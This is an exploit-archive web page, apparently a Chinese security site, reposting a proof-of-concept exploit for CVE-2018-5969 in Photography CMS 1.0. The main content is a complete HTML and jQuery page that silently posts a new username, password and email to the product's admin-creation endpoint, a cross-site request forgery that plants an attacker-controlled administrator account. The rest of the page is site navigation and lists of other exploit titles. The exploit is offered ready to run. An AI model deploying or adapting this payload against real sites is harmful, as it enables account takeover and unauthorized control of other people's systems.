首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
来源:http://ihsan.net 作者:Sencan 发布时间:2018-01-24  
<!--
# # # # #
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
    <label for="username">Username:</label>
    <input id="username" type="text"><br><br>
 
    <label for="password1">Password:</label>
    <input id="password1" type="password"><br><br>
 
    <label for="password2">Confirm Password:</label>
    <input id="password2" type="password"><br><br>
 
    <label for="email">Email:</label>
    <input id="email" type="text"><br><br>
 
    <input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
    $("#ekleabi").live('click',function()
    {
        $.ajax({
            type: "POST",
            url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
            data:{
                username:$(".efe #username").val(),
                password1:$(".efe #password1").val(),
                password2:$(".efe #password2").val(),
                email:$(".efe #email").val()
            }
        });
    });
</script>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Connected Backup 8.6/8.8.6
·Asus Unauthenticated LAN Remot
·RAVPower 2.000.056 - Memory Di
·MikroTik RouterOS < 6.38.5 Rem
·MixPad 5.00 - Buffer Overflow
·GoAhead Web Server LD_PRELOAD
·NEC Univerge SV9100/SV8100 Web
·Kaltura Remote PHP Code Execut
·Simple ASC CMS 1.2 Database Di
·Sync Breeze Enterprise 9.5.16
·PHPFreeChat 1.7 - Denial of Se
·RAVPower 2.000.056 - Root Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved